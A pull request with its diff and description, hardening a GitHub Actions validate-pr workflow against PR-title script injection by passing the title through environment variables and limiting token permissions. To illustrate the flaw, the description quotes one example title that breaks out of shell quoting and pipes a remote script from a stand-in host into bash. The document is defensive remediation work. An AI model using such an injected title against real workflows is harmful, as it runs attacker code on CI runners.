### PR TITLE
FIX @W-19079373@ Prevent PR title injection in validate-pr workflow

### DIFF
--- a/.github/workflows/validate-pr.yml
+++ b/.github/workflows/validate-pr.yml
@@ -3,6 +3,11 @@ on:
   pull_request:
     types: [edited, opened, reopened, synchronize]
 
+# Principle of least privilege: this workflow only needs to read repository
+# contents. Restricting the token limits the blast radius of any compromised step.
+permissions:
+  contents: read
+
 jobs:
   # We need to verify that the Pull Request's title matches the desired format.
   verify_pr_title:
@@ -13,10 +18,16 @@ jobs:
       - name: Checkout
         uses: actions/checkout@v4
       - name: Verify PR Title
+        # Pass untrusted values (the PR title) via the environment rather than
+        # direct ${{ }} interpolation, so they are treated as data and cannot
+        # inject shell commands.
+        env:
+          PR_TITLE: ${{ github.event.pull_request.title }}
+          BASE_REF: ${{ github.base_ref }}
         run: |
-          title="${{ github.event.pull_request.title }}"
+          title="$PR_TITLE"
           title_upper=$(echo "$title" | tr '[:lower:]' '[:upper:]')
-          base_ref="${{ github.base_ref }}"
+          base_ref="$BASE_REF"
 
           # Define regex patterns for different types of PR titles
           MAIN2DEV_REGEX="^MAIN2DEV[[:space:]]*:?[[:space:]]*@W-[[:digit:]]{8,9}@.*MERGING.+[[:digit:]]{1,2}\.[[:digit:]]{1,2}\.[[:digit:]]{1,2}.*"


### PR DESCRIPTION
## What & why

Fixes **W-19079373** — *[PVR] GitHub Workflows Vulnerable to PR Title Injection* (P2, Pre-production Security Debt).

The `validate-pr` workflow interpolated the attacker-controlled `github.event.pull_request.title` **directly into the `run:` shell script**. Because `${{ }}` expansion is textual substitution performed *before* bash parses the script, a crafted PR title such as `x"; curl evil.sh | bash; echo "` breaks out of the `title="..."` assignment and executes arbitrary commands on the runner (CWE-94 script injection).

## Fix

- Pass the untrusted PR title (and `base_ref`, for consistency) through **environment variables** instead of inline `${{ }}` interpolation, so they are handled as data and cannot inject shell commands. This is the [GitHub-recommended remediation](https://github.blog/security/vulnerability-research/how-to-catch-github-actions-workflow-injections-before-attackers-do/).
- Add a least-privilege `permissions: contents: read` block to cap the token's blast radius.

The `startsWith(github.head_ref, ...)` usages were already safe (they interpolate a literal `true`/`false`, not the raw ref) and are unchanged.

## Notes

- Trigger is `on: pull_request` (not `pull_request_target`), so this hardens against same-repo abuse and cache poisoning and removes the finding.
- Sibling PRs fixing the same pattern: `code-analyzer-core` #498 and `sfdx-code-analyzer-vscode` (incoming).

## Testing

- `validate-pr` re-runs on this PR and exercises the modified title-validation logic.
- YAML validated locally.